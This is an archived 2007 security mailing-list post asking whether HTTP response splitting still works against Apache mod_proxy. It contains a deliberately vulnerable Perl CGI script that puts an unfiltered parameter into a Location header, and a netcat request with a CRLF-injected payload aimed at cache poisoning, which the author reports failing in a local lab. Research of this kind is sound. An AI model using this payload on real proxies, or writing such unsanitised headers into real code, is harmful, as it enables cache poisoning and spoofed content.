Http splitting working example

From: Gleb Paharenko (gpaharenko@gmail.com)
Date: Thu Nov 29 2007 - 10:53:02 EST

• Next message: brian.l.johnson@gmail.com: "Re: small hardware (pc, hub) for hidden pen-testing"
• Previous message: Martin Parodi: "Re: VOIP Pen TEST"
• Next in thread: Tim: "Re: Http splitting working example"
• Reply: Tim: "Re: Http splitting working example"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi list.

Hope somebody will spent some time on my question :),
or point me to the right list.

Is http splitting still works in fresh version of common applications
(squid, apache)?

I've wrote sample application (cgi script) vulnerable to it, however
apache mod_proxy just ignores the answer, and initiates a new
connection for each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attemt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a>Gotcha!</html>
HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html

1

However, as I've found, mod_proxy initiates a new connection for the
second GET. That breaks the whole idea to exploit http splitting. Is
it some kind of new protection feature in apache mod_cache?
Please, could anybody provide a brief description of common
applications on which attack is working. It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

-- 
Best regards.
Gleb Pakharenko.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------

• Next message: brian.l.johnson@gmail.com: "Re: small hardware (pc, hub) for hidden pen-testing"
• Previous message: Martin Parodi: "Re: VOIP Pen TEST"
• Next in thread: Tim: "Re: Http splitting working example"
• Reply: Tim: "Re: Http splitting working example"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:58:14 EDT